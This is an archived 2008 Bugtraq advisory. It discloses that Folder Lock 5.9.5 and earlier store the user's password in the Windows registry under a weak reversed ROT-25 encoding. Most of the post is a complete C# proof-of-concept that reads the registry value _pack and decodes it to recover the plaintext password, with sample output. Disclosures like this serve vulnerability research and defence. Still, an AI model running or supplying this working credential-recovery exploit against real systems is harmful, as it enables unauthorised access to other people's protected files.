lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200808200211.m7K2BTDo018747@www5.securityfocus.com>
Date: Tue, 19 Aug 2008 20:11:29 -0600
From: glafkos@...osec.org.uk
To: bugtraq@...urityfocus.com
Subject: Folder Lock <= 5.9.5 Local Password Information Disclosure

/* 
 * Folder Lock <= 5.9.5 Local Password Information Disclosure
 * 
 * Author(s): Charalambous Glafkos
 *            George Nicolaou
 * Date: June 19, 2008
 * Site: http://www.astalavista.com
 * Mail: glafkos@...alavista.com
 *       ishtus@...alavista.com
 *
 * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
 * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
 * The security issue is caused due to the application storing access credentials within the Windows registry key:
 * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. 
 * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
 * 
 * Sample Output:
 * 
 * ASTALAVISTA the hacking & security community
 * Folder Lock <= 5.9.5 Decrypter v2.0
 * ---------------------------------
 * Encrypted Password: :3<k_^62`4T-
 * Decrypted Password: ,S3_15]^j;29
 * 
 */

using System;
using System.Text;
using System.IO;
using System.Threading;
using Microsoft.Win32;

namespace getRegistryValue
{
    class getValue
    {
        static void Main()
        {
            getValue details = new getValue();
            Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
            Console.WriteLine("Folder Lock <= 5.9.5  Decrypter v2.0");
            Console.WriteLine("---------------------------------");
            String strFL = details.getFL();
            Console.WriteLine(strFL);
            Thread.Sleep(5000);
        }

        private string getFL()
        {
            RegistryKey FLKey = Registry.CurrentUser;
            FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
            String _pack = FLKey.GetValue("_pack").ToString();
            String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; 
        return strFL;
        }

        public string Reverse(string x)
        {
            char[] charArray = new char[x.Length];
            int len = x.Length - 1;
            for (int i = 0; i <= len; i++)
                charArray[i] = x[len - i];
            return new string(charArray);
        }

        public static string Rotate(string toRotate)
        {
            char[] charArray = toRotate.ToCharArray();
            for (int i = 0; i < charArray.Length; i++)
            {
                int thisInt = (int)charArray[i];
                if (thisInt >= 65 && thisInt <= 91)
                {
                    thisInt += 25;
                    if (thisInt >= 91)
                    {
                        thisInt -= 26;
                    }
                }

                if (thisInt >= 92 && thisInt <= 96)
                {
                    thisInt += 25;
                    if (thisInt >= 96)
                    {
                        thisInt -= 26;
                    }
                }


                if (thisInt >= 32 && thisInt <= 47)
                {
                    thisInt += 25;

                    if (thisInt >= 47)
                    {
                        thisInt -= 26;
                    }
                }

               if (thisInt >= 48 && thisInt <= 57)
                {
                    thisInt += 25;

                    if (thisInt >= 57)
                    {
                        thisInt -= 26;
                    }
                }

                if (thisInt >= 58 && thisInt <= 64)
                {
                    thisInt += 25;

                    if (thisInt >= 64)
                    {
                        thisInt -= 26;
                    }
                }

               if (thisInt >= 97 && thisInt <= 123)
                {
                    thisInt += 25;

                    if (thisInt >= 123)
                    {
                        thisInt -= 26;
                    }
                }


               charArray[i] = (char)thisInt;
            }
            return new string(charArray);
        }    
    }
}


Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ